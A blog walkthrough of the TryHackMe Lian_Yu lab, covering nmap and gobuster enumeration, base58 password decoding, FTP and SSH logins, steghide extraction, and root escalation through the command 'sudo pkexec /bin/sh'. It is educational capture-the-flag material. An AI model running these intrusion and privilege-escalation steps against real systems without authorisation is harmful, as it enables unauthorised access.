Cyber Security Writeups

Lian_Yu TryHackMe Walkthrough writeup

Introduction

Hey folks, Volk here. In this writeup we are going to solve and explain the Lian_Yu challenge on TryHackMe.

This is a beginner-level challenge.

Tools Used

Nmap, Gobuster, CyberChef, ExifTool, hexeditor, Steghide, GTFOBins.

Enumeration

First, I scanned the target with Nmap to find the open ports, OS, service versions, etc. using the following command:

nmap -A [Machine_IP]

-A: OS detection, Script Scanning, Version detection, and traceroute

PORT    STATE SERVICE VERSION
21/tcp  open  ftp     vsftpd 3.0.2
22/tcp  open  ssh     OpenSSH 6.7p1 Debian 5+deb8u8 (protocol 2.0)
| ssh-hostkey: 
|   1024 56:50:bd:11:ef:d4:ac:56:32:c3:ee:73:3e:de:87:f4 (DSA)
|   2048 39:6f:3a:9c:b6:2d:ad:0c:d8:6d:be:77:13:07:25:d6 (RSA)
|   256 a6:69:96:d7:6d:61:27:96:7e:bb:9f:83:60:1b:52:12 (ECDSA)
|_  256 3f:43:76:75:a8:5a:a6:cd:33:b0:66:42:04:91:fe:a0 (ED25519)
80/tcp  open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Purgatory
111/tcp open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          35098/udp   status
|   100024  1          55094/tcp   status
|   100024  1          58104/tcp6  status
|_  100024  1          59600/udp6  status
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

I tried to log in to FTP with the username and password anonymous, but it was not allowed, so I decided to check port 80 (HTTP).

The Website

Nothing important, even in the source code, so let's try to brute force the hidden directories using Gobuster by typing:

gobuster dir -u http://10.10.166.42 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

dir: use directory brute force

-u: to specify the target URL

-w: to specify the path of the wordlist you want to use

that’s the result:

===============================================================
[+] Url:                     http://10.10.166.42
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
/island               (Status: 301) [Size: 235] [--> http://10.10.166.42/island/]

So I found a directory called island, then I checked its source code:

<p>You should find a way to <b> Lian_Yu</b> as we are planed. The Code Word is: </p><h2 style="color:white"> vigilante</h2>

As you can see, at the end of the code the word vigilante is hidden (white text on the page). We will use this word later, but for now let's run Gobuster against the island directory:

gobuster dir -u http://10.10.166.42/island -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt

===============================================================
[+] Url:                     http://10.10.166.42/island
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
/2100                 (Status: 301) [Size: 240] [--> http://10.10.166.42/island/2100/]

I found the directory /2100, and finding this directory answers the first question.

I went to http://[Machine_IP]/island/2100 

Nothing interesting, so I decided to check the source code:

<!DOCTYPE html>
<html>
<body>

<h1 align=center>How Oliver Queen finds his way to Lian_Yu?</h1>


<p align=center >
<iframe width="640" height="480" src="https://www.youtube.com/embed/X8ZiFuW41yY">
</iframe> <p>
<!-- you can avail your .ticket here but how?   -->

</header>
</body>
</html>

There is a comment in the source code hinting that there is a file whose extension is .ticket.

So let's use Gobuster to brute force the file name inside /2100, using -x so that the extension .ticket is appended to every word in the list:

gobuster dir -u http://10.10.166.42/island/2100 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x .ticket

===============================================================
[+] Url:                     http://10.10.132.83/island/2100/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              ticket
[+] Timeout:                 10s
===============================================================
/green_arrow.ticket   (Status: 200) [Size: 71]

We got the file name, and finding this file answers the second question.

When I accessed the file I found the encoded password

RTy8yhBQdscX

I tried several tools to analyze the hash until I found a good website, TunnelsUp, which told me it was base64. But when I went to CyberChef and tried to decode it from base64 I got nothing, so I tried all the base encodings until I got the password by decoding it with base58.
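As an added illustration (not part of the original writeup), here is a small Python script that does by hand what the TunnelsUp-then-CyberChef trial above does: it checks which base alphabet a token fits and whether the decoded bytes are readable text, which is why base64 "gives nothing" here while base58 works. The base58 codec and the printable-text heuristic are mine, not a tool from the page.

```python
import base64
import string

# Bitcoin-style base58 alphabet: no 0, O, I or l, and no +, / or = padding.
B58_ALPHABET = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"
B64_CHARS = set(string.ascii_letters + string.digits + "+/=")


def b58decode(s: str) -> bytes:
    """Decode base58: the string is one big-endian base-58 integer; leading '1's are zero bytes."""
    n = 0
    for ch in s:
        n = n * 58 + B58_ALPHABET.index(ch)   # raises ValueError on a character outside the alphabet
    body = n.to_bytes((n.bit_length() + 7) // 8, "big") if n else b""
    pad = len(s) - len(s.lstrip("1"))
    return b"\x00" * pad + body


def b58encode(data: bytes) -> str:
    """Inverse of b58decode, used here only to round-trip test the decoder."""
    n = int.from_bytes(data, "big")
    out = ""
    while n:
        n, rem = divmod(n, 58)
        out = B58_ALPHABET[rem] + out
    pad = len(data) - len(data.lstrip(b"\x00"))
    return "1" * pad + out


def decodes_to_text(raw: bytes) -> bool:
    """True when every byte is printable ASCII, which a decoded password should be."""
    return bool(raw) and all(32 <= b < 127 for b in raw)


def candidate_encodings(token: str) -> list:
    """Names of the encodings whose alphabet fits the token AND whose output is printable text."""
    found = []
    if set(token) <= B64_CHARS and len(token) % 4 == 0:
        try:
            if decodes_to_text(base64.b64decode(token, validate=True)):
                found.append("base64")
        except ValueError:
            pass
    if set(token) <= set(B58_ALPHABET):
        try:
            if decodes_to_text(b58decode(token)):
                found.append("base58")
        except ValueError:
            pass
    return found
```

Running `candidate_encodings("RTy8yhBQdscX")` on the ticket value reports only base58: the token is valid base64 too, but its base64 decoding contains non-printable bytes.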

Gaining Access

Now let's log in to FTP with the hidden username (vigilante) and the decoded password.

Connected to 10.10.124.174.
220 (vsFTPd 3.0.2)
Name (10.10.124.174:kali): vigilante
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.

Login successful. Now let's list the files and download them.

ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    2 1001     1001         4096 May 05  2020 .
drwxr-xr-x    4 0        0            4096 May 01  2020 ..
-rw-------    1 1001     1001           44 May 01  2020 .bash_history
-rw-r--r--    1 1001     1001          220 May 01  2020 .bash_logout
-rw-r--r--    1 1001     1001         3515 May 01  2020 .bashrc
-rw-r--r--    1 0        0            2483 May 01  2020 .other_user
-rw-r--r--    1 1001     1001          675 May 01  2020 .profile
-rw-r--r--    1 0        0          511720 May 01  2020 Leave_me_alone.png
-rw-r--r--    1 0        0          549924 May 05  2020 Queen's_Gambit.png
-rw-r--r--    1 0        0          191026 May 01  2020 aa.jpg
226 Directory send OK.

ftp> get .other_user

ftp> get Queen's_Gambit.png

ftp> get aa.jpg

ftp> get Leave_me_alone.png

We downloaded all the interesting files successfully. Now let's move up one directory.

ftp> cd ..
250 Directory successfully changed.
ftp> ls -la
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x    4 0        0            4096 May 01  2020 .
drwxr-xr-x   23 0        0            4096 Apr 30  2020 ..
drwx------    2 1000     1000         4096 May 01  2020 slade
drwxr-xr-x    2 1001     1001         4096 May 05  2020 vigilante
226 Directory send OK.

Analyzing the Files

As you can see we got another username, slade, and this information can be used later. For now, let's analyze the files we found. When I read the .other_user file I didn't find anything helpful apart from the username Slade, and I tried ExifTool on the images but didn't get any useful information either. If we try to open the Leave_me_alone.png file we get an error, and the reason is that the file signature (magic bytes) is wrong.

List of file signatures

Let’s Edit the header of the image using hexeditor

As you can see, the header does not match the PNG signature listed on Wikipedia, so let's make it the same.

After Editing it the image opened 🙂
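The hex-editor repair above, as an added Python example (not from the original writeup): it reports which of the first eight bytes disagree with the PNG signature and rewrites them, but only after confirming that an IHDR chunk follows the header, so a file that is not a PNG at all does not get relabeled as one. The sample bytes are constructed.

```python
import struct
import zlib

# The 8-byte PNG signature from the file-signature list linked above.
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def png_signature_problems(data: bytes) -> list:
    """Offsets (0..7) whose byte differs from the PNG signature; empty means the header is fine."""
    return [i for i in range(8) if i >= len(data) or data[i] != PNG_SIGNATURE[i]]


def first_chunk_is_ihdr(data: bytes) -> bool:
    """Every PNG starts with a 13-byte IHDR chunk right after the signature."""
    if len(data) < 16:
        return False
    length, ctype = struct.unpack(">I4s", data[8:16])
    return ctype == b"IHDR" and length == 13


def repair_png_signature(data: bytes) -> bytes:
    """Overwrite the first 8 bytes with the correct signature, as the hexeditor step does.
    Refuses when the rest of the file does not look like a PNG."""
    if not first_chunk_is_ihdr(data):
        raise ValueError("no IHDR chunk after the header; this is probably not a PNG")
    return PNG_SIGNATURE + data[8:]


def _ihdr_chunk() -> bytes:
    # Constructed minimal IHDR chunk: 1x1 pixel, 8-bit RGB, with a valid CRC.
    body = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)
    crc = zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF
    return struct.pack(">I", 13) + b"IHDR" + body + struct.pack(">I", crc)


# Constructed sample with a corrupted signature: bytes 0 and 4 are wrong, the rest is intact.
SAMPLE_BAD = b"\x00PNG\x00\n\x1a\n" + _ihdr_chunk()


if __name__ == "__main__":
    print("bad offsets:", png_signature_problems(SAMPLE_BAD))
    fixed = repair_png_signature(SAMPLE_BAD)
    print("repaired header ok:", png_signature_problems(fixed) == [])
```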

It is giving us a hint that the password is literally "password", so let's run Steghide against the files and try this password.

$ steghide extract -sf aa.jpg 
Enter passphrase: password
wrote extracted data to "ss.zip".
$ unzip ss.zip                      
Archive:  ss.zip
  inflating: passwd.txt              
  inflating: shado      

Nice, it worked! We got two files, let's see what is inside.

$ cat passwd.txt
This is your visa to Land on Lian_Yu # Just for Fun ***
a small Note about it
Having spent years on the island, Oliver learned how to be resourceful and 
set booby traps all over the island in the common event he ran into dangerous
people. The island is also home to many animals, including pheasants,
wild pigs and wolves.

$ cat shado          
M3tahuman

Nothing interesting in passwd.txt, but it looks like the shado file contains the SSH password. Let's connect over SSH.

$ ssh slade@10.10.120.240
slade@10.10.120.240's password: M3tahuman
			      Way To SSH...
			  Loading.........Done.. 
		   Connecting To Lian_Yu  Happy Hacking

██╗    ██╗███████╗██╗      ██████╗ ██████╗ ███╗   ███╗███████╗██████╗ 
██║    ██║██╔════╝██║     ██╔════╝██╔═══██╗████╗ ████║██╔════╝╚════██╗
██║ █╗ ██║█████╗  ██║     ██║     ██║   ██║██╔████╔██║█████╗   █████╔╝
██║███╗██║██╔══╝  ██║     ██║     ██║   ██║██║╚██╔╝██║██╔══╝  ██╔═══╝ 
╚███╔███╔╝███████╗███████╗╚██████╗╚██████╔╝██║ ╚═╝ ██║███████╗███████╗
 ╚══╝╚══╝ ╚══════╝╚══════╝ ╚═════╝ ╚═════╝ ╚═╝     ╚═╝╚══════╝╚══════╝


	██╗     ██╗ █████╗ ███╗   ██╗     ██╗   ██╗██╗   ██╗
	██║     ██║██╔══██╗████╗  ██║     ╚██╗ ██╔╝██║   ██║
	██║     ██║███████║██╔██╗ ██║      ╚████╔╝ ██║   ██║
	██║     ██║██╔══██║██║╚██╗██║       ╚██╔╝  ██║   ██║
	███████╗██║██║  ██║██║ ╚████║███████╗██║   ╚██████╔╝
	╚══════╝╚═╝╚═╝  ╚═╝╚═╝  ╚═══╝╚══════╝╚═╝    ╚═════╝  #

slade@LianYu:~$ cat user.txt
THM{Root_Flag}

We got the user flag 🙂

Privilege Escalation

Let's run sudo -l to see which commands this user (slade) can execute as root.

slade@LianYu:~$ sudo -l
[sudo] password for slade: 
Matching Defaults entries for slade on LianYu:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User slade may run the following commands on LianYu:
    (root) PASSWD: /usr/bin/pkexec

Nice, we can run pkexec with root privileges. Now let's go to GTFOBins and search for pkexec:

sudo pkexec /bin/sh

Let's execute the above command to escalate to root privileges.

slade@LianYu:~$ sudo pkexec /bin/sh
# ls
root.txt
# cat root.txt
                          Mission accomplished



You are injected me with Mirakuru:) ---> Now slade Will become DEATHSTROKE. 



THM{Root_Flag}
									      --DEATHSTROKE

And we got the root flag :). Thanks for reading the writeup, see you in the next one.

Volk_407
My name is Moustafa. I am a Penetration Tester 💻 | Bug Hunter 🐛 | Video Editor 🎥. Acknowledgements: Marvel/TWDC | Pinterest | Picsart | Vanilla. Certifications: eJPT | eWPTX | eMAPT | ICCA | CAP